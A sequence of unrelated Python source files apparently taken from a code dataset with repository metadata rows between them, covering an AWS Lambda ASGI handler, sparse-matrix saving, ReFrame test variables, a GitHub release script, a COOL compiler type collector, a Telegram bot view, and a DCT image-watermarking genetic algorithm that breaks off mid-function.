* **api_gateway_endpoint_url** - A string endpoint url to use for API Gateway when
sending data to WebSocket connections. Default is to determine this automatically.
* **api_gateway_region_name** - A string region name to use for API Gateway when
sending data to WebSocket connections. Default is `AWS_REGION` environment variable.
"""
app: ASGIApp
lifespan: str = "auto"
dsn: Optional[str] = None
api_gateway_endpoint_url: Optional[str] = None
api_gateway_region_name: Optional[str] = None
connect_hook: Optional[Callable] = None
disconnect_hook: Optional[Callable] = None
def __init__(
self,
app: ASGIApp,
lifespan: str = "auto",
dsn: Optional[str] = None,
api_gateway_endpoint_url: Optional[str] = None,
api_gateway_region_name: Optional[str] = None,
connect_hook: Optional[Callable] = None,
disconnect_hook: Optional[Callable] = None,
**handler_kwargs: Dict[str, Any]
) -> None:
self.app = app
self.lifespan = lifespan
self.dsn = dsn
self.api_gateway_endpoint_url = api_gateway_endpoint_url
self.api_gateway_region_name = api_gateway_region_name
self.handler_kwargs = handler_kwargs
self.connect_hook = connect_hook
self.disconnect_hook = disconnect_hook
if self.lifespan not in ("auto", "on", "off"):
raise ConfigurationError(
"Invalid argument supplied for `lifespan`. Choices are: auto|on|off"
)
if connect_hook and not callable(connect_hook):
raise Exception("Invalid connect_hook supplied. Must be a callable")
if disconnect_hook and not callable(disconnect_hook):
raise Exception("Invalid disconnect_hook supplied. Must be callable")
def __call__(self, event: dict, context: "LambdaContext") -> dict:
logger.debug("Event received.")
with ExitStack() as stack:
if self.lifespan != "off":
lifespan_cycle: ContextManager = LifespanCycle(self.app, self.lifespan)
stack.enter_context(lifespan_cycle)
handler = AbstractHandler.from_trigger(
event, context, **self.handler_kwargs
)
request = handler.request
if isinstance(request, WsRequest):
api_gateway_endpoint_url = (
self.api_gateway_endpoint_url or handler.api_gateway_endpoint_url
)
websocket = WebSocket(
dsn=self.dsn,
api_gateway_endpoint_url=api_gateway_endpoint_url,
api_gateway_region_name=self.api_gateway_region_name,
connect_hook=self.connect_hook,
disconnect_hook=self.disconnect_hook,
)
websocket_cycle = WebSocketCycle(
request, handler.message_type, handler.connection_id, websocket
)
response = websocket_cycle(self.app, handler.body)
else:
http_cycle = HTTPCycle(request)
response = http_cycle(self.app, handler.body)
return handler.transform_response(response)
| 36.428571
| 88
| 0.654248
|
4a1102f91939953f173629a36f66958b61719cc2
| 787
|
py
|
Python
|
savenpz.py
|
bHodges97/pdf-from-site
|
7982619567f006a62a11cecfb7d617bc968e9ddc
|
[
"MIT"
] | 2
|
2021-07-06T01:58:06.000Z
|
2021-09-25T07:38:55.000Z
|
savenpz.py
|
bHodges97/pdf-from-site
|
7982619567f006a62a11cecfb7d617bc968e9ddc
|
[
"MIT"
] | 1
|
2021-06-02T00:17:30.000Z
|
2021-06-02T00:17:30.000Z
|
savenpz.py
|
bHodges97/pdf-from-site
|
7982619567f006a62a11cecfb7d617bc968e9ddc
|
[
"MIT"
] | null | null | null |
import numpy as np
from scipy.sparse import csr_matrix
def save_npz(file, matrix, vocab, fixed=[], compressed=False):
arrays_dict = {}
arrays_dict.update(indices=matrix.indices, indptr=matrix.indptr)
arrays_dict.update(
shape=matrix.shape,
data=matrix.data,
vocab=vocab,
fixed=np.array(list(fixed))
)
if compressed:
np.savez_compressed(file, **arrays_dict)
else:
np.savez(file, **arrays_dict)
def load_npz(file):
with np.load(file) as loaded:
matrix = csr_matrix((loaded['data'], loaded['indices'], loaded['indptr']), shape=loaded['shape'])
vocab = loaded['vocab']
if 'fixed' in loaded:
return (matrix,vocab,loaded['fixed'])
else:
return (matrix,vocab)
| 30.269231
| 105
| 0.623888
|
4a11031ee4ab19e588b1ae096080ac51a7d84a35
| 1,164
|
py
|
Python
|
exercicios/ex084.py
|
renaisaalves/Python-CursoemVideo
|
ffb7b2cb95ae6ff5a4f2266e5c3ed2fc33951808
|
[
"MIT"
] | null | null | null |
exercicios/ex084.py
|
renaisaalves/Python-CursoemVideo
|
ffb7b2cb95ae6ff5a4f2266e5c3ed2fc33951808
|
[
"MIT"
] | null | null | null |
exercicios/ex084.py
|
renaisaalves/Python-CursoemVideo
|
ffb7b2cb95ae6ff5a4f2266e5c3ed2fc33951808
|
[
"MIT"
] | null | null | null |
#ex084: Faça um programa que leia nome e peso de várias pessoas, guardando tudo em uma lista. No final, mostre:A) Quantas pessoas foram cadastradas. B) Uma listagem com as pessoas mais pesadas. C) Uma listagem com as pessoas mais leves.
# NÃO CONSEGUI FAZER
cadastro = []
listagem = list()
maior = menor = 0
while True:
cadastro.append(str(input('Nome: ')).capitalize())
cadastro.append(int(input('Peso: ')))
if len(listagem) == 0:
maior = menor = cadastro[1]
else:
if cadastro[1] > maior:
maior = cadastro[1]
if cadastro[1] < menor:
menor = cadastro[1]
listagem.append(cadastro[:]) #a listagem fez uma cópia da lista anterior. Isso é fundamental.
cadastro.clear()
resposta = str(input('Quer continuar? [Sim/Não]: ')).upper()
if resposta not in 'SIMS':
break
print('=' * 30)
print(f'{len(listagem)} pessoas foram cadastradas:')
print(f'O maior peso foi de {maior}kg. ')
print(f'O menor peso foi de {menor}kg. ')
print(listagem)
print('=' * 30)
for i in listagem:
if i[1] == maior:
print(f'{i[0]} é o maior.')
else:
print(f'{i[0]} é o menor.')
| 32.333333
| 236
| 0.627148
|
4a110358b55894e94f1ca4b74bcfba6f2d9f7f08
| 7,537
|
py
|
Python
|
reframe/core/variables.py
|
toxa81/reframe
|
81357405c0c53ba9def4048c29774c867c69adc2
|
[
"BSD-3-Clause"
] | null | null | null |
reframe/core/variables.py
|
toxa81/reframe
|
81357405c0c53ba9def4048c29774c867c69adc2
|
[
"BSD-3-Clause"
] | null | null | null |
reframe/core/variables.py
|
toxa81/reframe
|
81357405c0c53ba9def4048c29774c867c69adc2
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2016-2021 Swiss National Supercomputing Centre (CSCS/ETH Zurich)
# ReFrame Project Developers. See the top-level LICENSE file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# Functionality to build extensible variable spaces into ReFrame tests.
#
import copy
import reframe.core.namespaces as namespaces
import reframe.core.fields as fields
class _UndefinedType:
'''Custom type to flag a variable as undefined.'''
__slots__ = ()
def __deepcopy__(self, memo):
return self
_Undefined = _UndefinedType()
class VarDirective:
'''Base class for the variable directives.'''
class TestVar(VarDirective):
'''Regression test variable class.
Stores the attributes of a variable when defined directly in the class
body. Instances of this class are injected into the regression test
during class instantiation.
:meta private:
'''
def __init__(self, *args, **kwargs):
self.field_type = kwargs.pop('field', fields.TypedField)
self._default_value = kwargs.pop('value', _Undefined)
if not issubclass(self.field_type, fields.Field):
raise ValueError(
f'field {self.field_type!r} is not derived from '
f'{fields.Field.__qualname__}'
)
self.args = args
self.kwargs = kwargs
def is_defined(self):
return self._default_value is not _Undefined
def undefine(self):
self._default_value = _Undefined
def define(self, value):
self._default_value = value
def __set_name__(self, owner, name):
self.name = name
@property
def default_value(self):
# Variables must be returned by-value to prevent an instance from
# modifying the class variable space.
return copy.deepcopy(self._default_value)
class UndefineVar(VarDirective):
def __init__(self):
self.default_value = _Undefined
class VarSpace(namespaces.Namespace):
'''Variable space of a regression test.
Store the variables of a regression test. This variable space is stored
in the regression test class under the class attribute ``_rfm_var_space``.
A target class can be provided to the
:func:`__init__` method, which is the regression test where the
VarSpace is to be built. During this call to
:func:`__init__`, the VarSpace inherits all the VarSpace from the base
classes of the target class. After this, the VarSpace is extended with
the information from the local variable space, which is stored under the
target class' attribute ``_rfm_local_var_space``. If no target class is
provided, the VarSpace is simply initialized as empty.
'''
@property
def local_namespace_name(self):
return '_rfm_local_var_space'
@property
def namespace_name(self):
return '_rfm_var_space'
def __init__(self, target_cls=None, illegal_names=None):
# Set to register the variables already injected in the class
self._injected_vars = set()
super().__init__(target_cls, illegal_names)
def join(self, other, cls):
'''Join an existing VarSpace into the current one.
:param other: instance of the VarSpace class.
:param cls: the target class.
'''
for key, var in other.items():
# Make doubly declared vars illegal. Note that this will be
# triggered when inheriting from multiple RegressionTest classes.
if key in self.vars:
raise ValueError(
f'variable {key!r} is declared in more than one of the '
f'parent classes of class {cls.__qualname__!r}'
)
self.vars[key] = copy.deepcopy(var)
# Carry over the set of injected variables
self._injected_vars.update(other._injected_vars)
def extend(self, cls):
'''Extend the VarSpace with the content in the LocalVarSpace.
Merge the VarSpace inherited from the base classes with the
LocalVarSpace. Note that the LocalVarSpace can also contain
define and undefine actions on existing vars. Thus, since it
does not make sense to define and undefine a var in the same
class, the order on which the define and undefine functions
are called is not preserved. In fact, applying more than one
of these actions on the same var for the same local var space
is disallowed.
'''
local_varspace = getattr(cls, self.local_namespace_name)
for key, var in local_varspace.items():
if isinstance(var, TestVar):
# Disable redeclaring a variable
if key in self.vars:
raise ValueError(
f'cannot redeclare the variable {key!r}'
)
# Add a new var
self.vars[key] = var
elif isinstance(var, VarDirective):
# Modify the value of a previously declared var.
# If var is an instance of UndefineVar, we set its default
# value to _Undefined. Alternatively, the value is just updated
# with the user's input.
self._check_var_is_declared(key)
self.vars[key].define(var.default_value)
# If any previously declared variable was defined in the class body
# by directly assigning it a value, retrieve this value from the class
# namespace and update it into the variable space.
_assigned_vars = set()
for key, value in cls.__dict__.items():
if key in local_varspace:
raise ValueError(
f'cannot specify more than one action on variable '
f'{key!r} in the same class'
)
elif key in self.vars:
self.vars[key].define(value)
_assigned_vars.add(key)
# Delete the vars from the class __dict__.
for key in _assigned_vars:
delattr(cls, key)
def _check_var_is_declared(self, key):
if key not in self.vars:
raise ValueError(
f'variable {key!r} has not been declared'
)
def sanity(self, cls, illegal_names=None):
'''Sanity checks post-creation of the var namespace.
By default, we make illegal to have any item in the namespace
that clashes with a member of the target class unless this member
was injected by this namespace.
'''
if illegal_names is None:
illegal_names = set(dir(cls))
for key in self._namespace:
if key in illegal_names and key not in self._injected_vars:
raise ValueError(
f'{key!r} already defined in class '
f'{cls.__qualname__!r}'
)
def inject(self, obj, cls):
'''Insert the vars in the regression test.
:param obj: The test object.
:param cls: The test class.
'''
for name, var in self.items():
setattr(cls, name, var.field_type(*var.args, **var.kwargs))
getattr(cls, name).__set_name__(obj, name)
# If the var is defined, set its value
if var.is_defined():
setattr(obj, name, var.default_value)
# Track the variables that have been injected.
self._injected_vars.add(name)
@property
def vars(self):
return self._namespace
| 34.259091
| 79
| 0.627703
|
4a1103aeb8eb2970fd27433a320cf6496fa444da
| 671
|
py
|
Python
|
build/navigation/global_planner/catkin_generated/pkg.develspace.context.pc.py
|
EurobotMDX/eurobot_2020_odroid_cam
|
ddd9a17d53899f1c615816fd74512c112ecad188
|
[
"MIT"
] | 4
|
2019-10-26T18:48:51.000Z
|
2020-02-27T19:31:36.000Z
|
build/navigation/global_planner/catkin_generated/pkg.develspace.context.pc.py
|
EurobotMDX/eurobot_2020_odroid_cam
|
ddd9a17d53899f1c615816fd74512c112ecad188
|
[
"MIT"
] | null | null | null |
build/navigation/global_planner/catkin_generated/pkg.develspace.context.pc.py
|
EurobotMDX/eurobot_2020_odroid_cam
|
ddd9a17d53899f1c615816fd74512c112ecad188
|
[
"MIT"
] | 1
|
2019-10-26T18:50:48.000Z
|
2019-10-26T18:50:48.000Z
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/ros/lidar_ws/devel/include;/home/ros/lidar_ws/src/navigation/global_planner/include".split(';') if "/home/ros/lidar_ws/devel/include;/home/ros/lidar_ws/src/navigation/global_planner/include" != "" else []
PROJECT_CATKIN_DEPENDS = "costmap_2d;dynamic_reconfigure;geometry_msgs;nav_core;navfn;nav_msgs;pluginlib;roscpp;tf".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lglobal_planner".split(';') if "-lglobal_planner" != "" else []
PROJECT_NAME = "global_planner"
PROJECT_SPACE_DIR = "/home/ros/lidar_ws/devel"
PROJECT_VERSION = "1.14.5"
| 74.555556
| 245
| 0.782414
|
4a11040b00fd018bb9df6cdcf5e2e0bcf545877a
| 2,435
|
py
|
Python
|
db-files/connect.py
|
buzzer4mornin/CTMP-ThesisProject
|
83e54700d0edd8dd141127998dacd7faf11be081
|
[
"MIT"
] | 5
|
2021-07-11T13:36:37.000Z
|
2022-02-07T22:21:13.000Z
|
db-files/connect.py
|
buzzer4mornin/CTMP-ThesisProject
|
83e54700d0edd8dd141127998dacd7faf11be081
|
[
"MIT"
] | null | null | null |
db-files/connect.py
|
buzzer4mornin/CTMP-ThesisProject
|
83e54700d0edd8dd141127998dacd7faf11be081
|
[
"MIT"
] | null | null | null |
import cx_Oracle as cx
import pandas as pd
import os
# Change to Current File Directory
os.chdir(os.path.dirname(__file__))
# Get Current File Directory
currdir = str(os.path.dirname(os.path.abspath(__file__)))
def get_credentials() -> list:
c = []
with open('./credentials.txt') as f:
for line in f.readlines():
try:
# fetching username and password
_, value = line.split(": ")
except:
# raises error
print('Add your username and password in credentials file')
exit(0)
c.append(value.rstrip(" \n"))
return c
"-*- Disconnect from VPN -*-"
dsnStr = cx.makedsn("tirpitz.ms.mff.cuni.cz", 1511, "jedenact")
print(dsnStr)
db_credentials = get_credentials()
try:
# Connect to DB
db = cx.connect(*db_credentials, dsn=dsnStr)
cur = db.cursor()
# -- 1st Query -- [Get USER table] [UNCOMMENT to run]
'''cur.execute("select USERID from A_MUSERS")
db.commit()
df = pd.DataFrame(cur.fetchall())
df.columns = ["USERID"]
df.to_pickle(currdir + '/df_user')'''
# -- 2nd Query -- [Get RATING table] [UNCOMMENT to run]
'''cur.execute("select USERID, MOVIEID, RATING from A_MRATINGS")
db.commit()
df = pd.DataFrame(cur.fetchall())
df.columns = ["USERID", "MOVIEID", "RATING"]
df.to_pickle(currdir + '/df_rating')'''
# -- 3rd Query -- [Get MOVIE table] (parse XML plot from IMDB) [UNCOMMENT to run]
'''cur.execute(
"SELECT e.TT, e.XML.getClobval() AS coXML, A_MMOVIES.MOVIEID FROM IMDB e inner join A_MMOVIES on e.TT = A_MMOVIES.TT")
db.commit()
df = cur.fetchall()
# columns: TT(str) -- CLOB(obj) -- MOVIEID(int)
print(df)
plot_extractor = lambda xml: (xml.split('plot="'))[1].split('"')[0]
for i in range(len(df)):
df[i] = list(df[i])
df[i][1] = plot_extractor(df[i][1].read())
print(i)
df = pd.DataFrame(df)
df.columns = ["TT", "MOVIEPLOT", "MOVIEID"]
df.to_pickle(currdir + '/df_movie')'''
# Another way to Query
# for row in cur.execute("select ACTORS from IMDB"):
# print(row)
print("Table Created successful")
except cx.DatabaseError as e:
if str(e).startswith("ORA-24454"):
print("ERROR check VPN connection!")
else:
print("ERROR", e, )
else:
# Close all when done
if cur: cur.close()
if db: db.close()
| 29.337349
| 127
| 0.595893
|
4a11040d65bf9a1959a1f48bef876024d0aa5dac
| 5,754
|
py
|
Python
|
ci_tools/github_release.py
|
mchaaler/mkdocs-gallery
|
48a96bd32eb036b1ef82b64b4ef79a76c499eea9
|
[
"BSD-3-Clause"
] | 9
|
2021-12-14T17:03:13.000Z
|
2022-03-26T17:16:26.000Z
|
ci_tools/github_release.py
|
mchaaler/mkdocs-gallery
|
48a96bd32eb036b1ef82b64b4ef79a76c499eea9
|
[
"BSD-3-Clause"
] | 40
|
2021-12-09T08:09:03.000Z
|
2022-03-30T21:29:34.000Z
|
ci_tools/github_release.py
|
mchaaler/mkdocs-gallery
|
48a96bd32eb036b1ef82b64b4ef79a76c499eea9
|
[
"BSD-3-Clause"
] | 2
|
2020-08-05T07:06:44.000Z
|
2021-03-31T21:33:19.000Z
|
# a clone of the ruby example https://gist.github.com/valeriomazzeo/5491aee76f758f7352e2e6611ce87ec1
import os
from os import path
import re
import click
from click import Path
from github import Github, UnknownObjectException
# from valid8 import validate not compliant with python 2.7
@click.command()
@click.option('-u', '--user', help='GitHub username')
@click.option('-p', '--pwd', help='GitHub password')
@click.option('-s', '--secret', help='GitHub access token')
@click.option('-r', '--repo-slug', help='Repo slug. i.e.: apple/swift')
@click.option('-cf', '--changelog-file', help='Changelog file path')
@click.option('-d', '--doc-url', help='Documentation url')
@click.option('-df', '--data-file', help='Data file to upload', type=Path(exists=True, file_okay=True, dir_okay=False,
resolve_path=True))
@click.argument('tag')
def create_or_update_release(user, pwd, secret, repo_slug, changelog_file, doc_url, data_file, tag):
"""
Creates or updates (TODO)
a github release corresponding to git tag <TAG>.
"""
# 1- AUTHENTICATION
if user is not None and secret is None:
# using username and password
# validate('user', user, instance_of=str)
assert isinstance(user, str)
# validate('pwd', pwd, instance_of=str)
assert isinstance(pwd, str)
g = Github(user, pwd)
elif user is None and secret is not None:
# or using an access token
# validate('secret', secret, instance_of=str)
assert isinstance(secret, str)
g = Github(secret)
else:
raise ValueError("You should either provide username/password OR an access token")
click.echo("Logged in as {user_name}".format(user_name=g.get_user()))
# 2- CHANGELOG VALIDATION
regex_pattern = "[\s\S]*[\n][#]+[\s]*(?P<title>[\S ]*%s[\S ]*)[\n]+?(?P<body>[\s\S]*?)[\n]*?(\n#|$)" % re.escape(tag)
changelog_section = re.compile(regex_pattern)
if changelog_file is not None:
# validate('changelog_file', changelog_file, custom=os.path.exists,
# help_msg="changelog file should be a valid file path")
assert os.path.exists(changelog_file), "changelog file should be a valid file path"
with open(changelog_file) as f:
contents = f.read()
match = changelog_section.match(contents).groupdict()
if match is None or len(match) != 2:
raise ValueError("Unable to find changelog section matching regexp pattern in changelog file.")
else:
title = match['title']
message = match['body']
else:
title = tag
message = ''
# append footer if doc url is provided
message += "\n\nSee [documentation page](%s) for details." % doc_url
# 3- REPOSITORY EXPLORATION
# validate('repo_slug', repo_slug, instance_of=str, min_len=1, help_msg="repo_slug should be a non-empty string")
assert isinstance(repo_slug, str) and len(repo_slug) > 0, "repo_slug should be a non-empty string"
repo = g.get_repo(repo_slug)
# -- Is there a tag with that name ?
try:
tag_ref = repo.get_git_ref("tags/" + tag)
except UnknownObjectException:
raise ValueError("No tag with name %s exists in repository %s" % (tag, repo.name))
# -- Is there already a release with that tag name ?
click.echo("Checking if release %s already exists in repository %s" % (tag, repo.name))
try:
release = repo.get_release(tag)
if release is not None:
raise ValueError("Release %s already exists in repository %s. Please set overwrite to True if you wish to "
"update the release (Not yet supported)" % (tag, repo.name))
except UnknownObjectException:
# Release does not exist: we can safely create it.
click.echo("Creating release %s on repo: %s" % (tag, repo.name))
click.echo("Release title: '%s'" % title)
click.echo("Release message:\n--\n%s\n--\n" % message)
repo.create_git_release(tag=tag, name=title,
message=message,
draft=False, prerelease=False)
# add the asset file if needed
if data_file is not None:
release = None
while release is None:
release = repo.get_release(tag)
release.upload_asset(path=data_file, label=path.split(data_file)[1], content_type="application/gzip")
# --- Memo ---
# release.target_commitish # 'master'
# release.tag_name # '0.5.0'
# release.title # 'First public release'
# release.body # markdown body
# release.draft # False
# release.prerelease # False
# #
# release.author
# release.created_at # datetime.datetime(2018, 11, 9, 17, 49, 56)
# release.published_at # datetime.datetime(2018, 11, 9, 20, 11, 10)
# release.last_modified # None
# #
# release.id # 13928525
# release.etag # 'W/"dfab7a13086d1b44fe290d5d04125124"'
# release.url # 'https://api.github.com/repos/smarie/python-odsclient/releases/13928525'
# release.html_url # 'https://github.com/smarie/python-odsclient/releases/tag/0.5.0'
# release.tarball_url # 'https://api.github.com/repos/smarie/python-odsclient/tarball/0.5.0'
# release.zipball_url # 'https://api.github.com/repos/smarie/python-odsclient/zipball/0.5.0'
# release.upload_url # 'https://uploads.github.com/repos/smarie/python-odsclient/releases/13928525/assets{?name,label}'
if __name__ == '__main__':
create_or_update_release()
| 45.666667
| 129
| 0.623045
|
4a11045642c8185666c70e80cbccbf29b5885417
| 3,892
|
py
|
Python
|
src/semantics/type_collector.py
|
RodroVMS/cool-compiler-2022
|
718f962a647dc62be8562c946cf76fad419c08c5
|
[
"MIT"
] | null | null | null |
src/semantics/type_collector.py
|
RodroVMS/cool-compiler-2022
|
718f962a647dc62be8562c946cf76fad419c08c5
|
[
"MIT"
] | null | null | null |
src/semantics/type_collector.py
|
RodroVMS/cool-compiler-2022
|
718f962a647dc62be8562c946cf76fad419c08c5
|
[
"MIT"
] | null | null | null |
import semantics.visitor as visitor
from parsing.ast import Node, ProgramNode, ClassDeclarationNode
from semantics.tools import SemanticError
from semantics.tools import Context
class TypeCollector(object):
def __init__(self) -> None:
self.context = Context()
self.errors = []
self.type_graph = {"Object":["IO", "String", "Int", "Bool"], "IO":[], "String":[], "Int":[], "Bool":[]}
self.node_dict = dict()
@visitor.on('node')
def visit(self, node):
pass
@visitor.when(ProgramNode)
def visit(self, node):
self.context = Context()
self.init_default_classes()
for class_def in node.declarations:
self.visit(class_def)
new_declarations = self.get_type_hierarchy()
node.declarations = new_declarations
self.context.type_graph = self.type_graph
@visitor.when(ClassDeclarationNode)
def visit(self, node):
try:
self.context.create_type(node.id)
self.node_dict[node.id] = node
try:
self.type_graph[node.id]
except KeyError:
self.type_graph[node.id] = []
if node.parent:
if node.parent in {'String', 'Int, Bool'}:
raise SemanticError(f"Type \'{node.id}\' cannot inherit from \'{node.parent}\' beacuse is forbidden.")
try:
self.type_graph[node.parent].append(node.id)
except KeyError:
self.type_graph[node.parent] = [node.id]
else:
node.parent = "Object"
self.type_graph["Object"].append(node.id)
except SemanticError as error:
self.add_error(node, error.text)
def get_type_hierarchy(self):
visited = set(["Object"])
new_order = []
self.dfs_type_graph("Object", self.type_graph, visited, new_order, 1)
circular_heritage_errors = []
for node in self.type_graph:
if not node in visited:
visited.add(node)
path = [node]
circular_heritage_errors.append(self.check_circular_heritage(node, self.type_graph, path, visited))
new_order = new_order + [self.node_dict[node] for node in path]
if circular_heritage_errors:
print(circular_heritage_errors)
error = "Semantic Error: Circular Heritage:\n"
error += "\n".join(err for err in circular_heritage_errors)
self.add_error(None, error)
return new_order
def dfs_type_graph(self, root, graph, visited:set, new_order, index):
if not root in graph:
return
for node in graph[root]:
if node in visited:
continue
visited.add(node)
if node not in {"Int", "String", "IO", "Bool", "Object"}:
new_order.append(self.node_dict[node])
self.context.get_type(node, unpacked=True).index = index
self.dfs_type_graph(node, graph, visited, new_order, index + 1)
def check_circular_heritage(self, root, graph, path, visited):
for node in graph[root]:
if node in path:
return ' -> '.join(child for child in path + [path[0]])
visited.add(node)
path.append(node)
return self.check_circular_heritage(node, graph, path, visited)
def init_default_classes(self):
self.context.create_type('Object').index = 0
self.context.create_type('String')
self.context.create_type('Int')
self.context.create_type('IO')
self.context.create_type('Bool')
def add_error(self, node:Node, text:str):
line, col = node.get_position() if node else (0, 0)
self.errors.append(((line,col), f"({line}, {col}) - " + text))
| 37.786408
| 122
| 0.581449
|
4a110491feca5a85ba8ccca1097642ce914d7a58
| 1,913
|
py
|
Python
|
src/view.py
|
gordinmitya/supcardbot
|
fa3bfe5c51ad3256fda7418ffd267c861ff7d1ef
|
[
"MIT"
] | 1
|
2021-08-16T13:27:32.000Z
|
2021-08-16T13:27:32.000Z
|
src/view.py
|
gordinmitya/supcardbot
|
fa3bfe5c51ad3256fda7418ffd267c861ff7d1ef
|
[
"MIT"
] | null | null | null |
src/view.py
|
gordinmitya/supcardbot
|
fa3bfe5c51ad3256fda7418ffd267c861ff7d1ef
|
[
"MIT"
] | null | null | null |
from telegram import Message
RUB = 'р'
def currency(amount: int) -> str:
return f'{amount}{RUB}'
class View:
def __init__(self, message: Message) -> None:
self.m = message
def started(self, default_limit: int) -> None:
return self.m.reply_text(
"Давай знакомиться!\n" +
"Мне понадобится номер карты, но не тот, что на передней стороне, а с задней, там где штрихкод - 13 цифр.\n" +
"Отправь мне этот номер /card 1234567890123\n" +
f"Для того чтобы вычислить сколько осталось денег на сегодня по умолчанию используется лимит в {default_limit} рублей.\n" +
"Ты можешь изменить лимит командой /limit 800"
)
def card_added(self, today: int, total: int) -> None:
return self.m.reply_text(
"Карта добавлена!\n" +
self._info_text(today, total)
)
def no_card(self) -> None:
return self.m.reply_text(
"Сначала необходимо добавить карту.\n" +
"Отправь 13 цифр с обратной стороны карты (рядом со штрихкодом), командой\n" +
"/card 1234567890123"
)
def limit_applied_no_card(self, new_limit: int) -> None:
return self.m.reply_text(
f"Лимит изменен на {new_limit}\n" +
"Осталось добавить карту."
)
def limit_applied(self, new_limit: int, today: int) -> None:
return self.m.reply_text(
f"С учетом нового лимита в {new_limit} рублей,\n" +
f"на сегодня осталось {currency(today)}"
)
def help(self, card: int, limit: int) -> None:
return self.m.reply_text("help не дописал еще")
def _info_text(self, today: int, total: int) -> str:
return f"сегодня {currency(today)}\nвсего {currency(total)}"
def info(self, today: int, total: int) -> None:
return self.m.reply_text(self._info_text(today, total))
| 35.425926
| 135
| 0.6069
|
4a1104e38634365519a7ecb4ebd379963258de28
| 666
|
py
|
Python
|
leetCode/maximum_depth_of_binary_tree.py
|
yskang/AlgorithmPractice
|
31b76e38b4c2f1e3e29fb029587662a745437912
|
[
"MIT"
] | null | null | null |
leetCode/maximum_depth_of_binary_tree.py
|
yskang/AlgorithmPractice
|
31b76e38b4c2f1e3e29fb029587662a745437912
|
[
"MIT"
] | 1
|
2019-11-04T06:44:04.000Z
|
2019-11-04T06:46:55.000Z
|
leetCode/maximum_depth_of_binary_tree.py
|
yskang/AlgorithmPractice
|
31b76e38b4c2f1e3e29fb029587662a745437912
|
[
"MIT"
] | null | null | null |
# Title: Maximum Depth of Binary Tree
# Link: https://leetcode.com/problems/maximum-depth-of-binary-tree/
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Problem:
def max_depth(self, root: TreeNode) -> int:
if not root:
return 0
return max(self.max_depth(root.left), self.max_depth(root.right)) + 1
def solution():
root = TreeNode(3, TreeNode(9), TreeNode(20, TreeNode(15), TreeNode(7)))
problem = Problem()
return problem.max_depth(root)
def main():
print(solution())
if __name__ == '__main__':
main()
| 22.965517
| 77
| 0.633634
|
4a11056ab8275292165e1a0a7d4d481f8d9530e0
| 6,470
|
py
|
Python
|
individual.py
|
ChangMinPark/genetic-algorithm-dct
|
d0112031e788061df6676d43160ec8ffbf92781a
|
[
"MIT"
] | null | null | null |
individual.py
|
ChangMinPark/genetic-algorithm-dct
|
d0112031e788061df6676d43160ec8ffbf92781a
|
[
"MIT"
] | null | null | null |
individual.py
|
ChangMinPark/genetic-algorithm-dct
|
d0112031e788061df6676d43160ec8ffbf92781a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3.7
'''
@author: Chang Min Park (cpark22@buffalo.edu)
- Based on open source Genetic Algorithm written in Java:
(https://github.com/memento/GeneticAlgorithm)
- Improved by refering to a paper, "Enhancement of image watermark retrieval
based on genetic algorithms", for image watermarking.
'''
import numpy as np
from ga_utils import Utils
# Whether to enable advanced strategy for initializing the first population.
ADV_1ST_POP = True
EMB_SHIFT = 2
class Individual:
def __init__(self, img_blk: np.array, msg: np.array):
self._img_blk = img_blk
self._dct_coef = Utils.dct2(img_blk)
self._msg = msg
self._chromosome_len = 8 * 8
self._fitness = 0
self._zigzag = self._get_zigzag()
self._e_cap = self._get_embedding_capacity()
if ADV_1ST_POP:
self._chromosomes = self._generate_initial_chromosome()
else:
self._chromosomes = \
np.random.choice(a=[0, 1], size=self._chromosome_len)
def calculate_fitness(self) -> None:
# Calculate the similarity between the original message and the
# extracted message from watermarked DCT after rounds of IDCT and DCT
dct_emb = self._embed_msg()
idct_emb = Utils.idct2(dct_emb)
idct_emb += self._chromosomes.reshape(8,8)
ext_msg = self._extract_msg(Utils.dct2(idct_emb.astype(int)))
self._fitness = 0
for idx in range(len(self._msg)):
if self._msg[idx] == ext_msg[idx]:
self._fitness += 1
def tostring(self) -> str:
return '[chromosome=%s]' % (str(self._chromosomes * 1))
def clone(self):
new_indiv = Individual(self._img_blk, self._msg)
new_indiv._chromosomes = np.copy(self._chromosomes)
new_indiv._fitness = self._fitness
return new_indiv
def get_fitness(self) -> int:
return self._fitness
def get_chromosomes(self) -> np.array:
return self._chromosomes
def get_w_img_blk(self) -> np.array:
dct_emb = self._embed_msg()
idct_emb = Utils.idct2(dct_emb)
idct_emb += self._chromosomes.reshape(8,8)
return idct_emb.astype(np.uint8)
# --------------------- #
# Private functions #
# --------------------- #
def _generate_initial_chromosome(self) -> np.array:
dct_emb = self._embed_msg()
idct_emb = Utils.idct2(dct_emb).astype(int).reshape(8,8)
img_blk = self._img_blk.flatten()
idct_blk = idct_emb.flatten()
return np.array( \
[img_blk[idx] != idct_blk[idx] for idx in range(len(idct_blk))]) * 1
def _get_embedding_capacity(self):
# Positions in DCT coefficient where to ebed message
positions = np.array([
[0, 0, 1, 1, 1, 0, 0, 0],
[0, 1, 1, 1, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
]).flatten()
# Indices of a list in zigzag order
zigzag = self._zigzag
# Bit capacity for each position
cap = [0] * sum(positions)
n = len(self._msg) // sum(positions)
r = len(self._msg) % sum(positions)
for idx in range(len(cap)):
cap[idx] = n
cap[idx] += 1 if idx < r else 0
# Apply capacity to the positions
for idx in range(len(positions)):
pos = zigzag[idx]
if positions[pos] == 1:
positions[pos] = cap.pop(0)
return positions
def _get_zigzag(self):
'''
Returns indices of AC coefficients for watermark storage in a zig-zag
manner. In case of block operation mode, the indices are selected in a
per one per block manner. Eg. for block = 8
1 3 6 . . . . .
2 5 9 . . . . .
4 8 . . . . . .
7 . . . . . . .
. . . . . . . .
. . . . . . . .
. . . . . . . .
. . . . . . . .
'''
idx = np.zeros(8 * 8).astype(np.uint8)
i = 0
for sc in range(8 * 2):
cc, cr = sc, 1
